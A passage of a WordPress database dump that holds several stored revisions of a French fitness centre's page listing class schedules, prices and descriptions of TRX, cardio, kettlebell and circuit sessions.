5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:49:05', '2013-07-03 16:49:05', '', 11, 'http://www.crosstrainingcenter.be/?p=175', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(176, 1, '2013-07-03 16:49:22', '2013-07-03 16:49:22', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:49:22', '2013-07-03 16:49:22', '', 11, 'http://www.crosstrainingcenter.be/?p=176', 0, 'revision', '', 0),
(183, 1, '2013-07-03 17:18:16', '2013-07-03 17:18:16', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr >\r\n<td >LUNDI</td>\r\n<td >MARDI</td>\r\n<td >MERCREDI</td>\r\n<td >JEUDI</td>\r\n<td >VENDREDI</td>\r\n</tr>\r\n<tr >\r\n<td >17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n<td >TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:18:16', '2013-07-03 17:18:16', '', 11, 'http://www.crosstrainingcenter.be/?p=183', 0, 'revision', '', 0),
(177, 1, '2013-07-03 16:53:51', '2013-07-03 16:53:51', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; 